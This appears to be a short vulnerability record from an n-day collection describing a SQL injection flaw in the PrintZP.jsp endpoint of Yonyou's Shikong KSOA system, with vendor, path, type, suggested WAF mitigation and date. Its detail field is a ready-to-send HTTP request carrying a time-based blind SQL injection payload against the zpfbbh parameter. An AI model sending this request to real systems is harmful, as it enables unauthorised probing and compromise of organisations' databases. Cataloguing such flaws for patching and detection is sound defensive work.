vendor = "用友"
name = "用友时空KSOA系统接口PrintZP.jsp存在SQL注入漏洞"
type = "SQL注入"
version = "未知"
path = "/kp/PrintZP.jsp"
detail = "GET /kp/PrintZP.jsp?zpfbbh=1%27+IF(LEN(db_name())>4)+WAITFOR+DELAY+%270:0:2%27+--+ HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 Connection: close"
fix = "WAF封禁路路径，等待发布补丁"
date = "0731"
label = "nday"
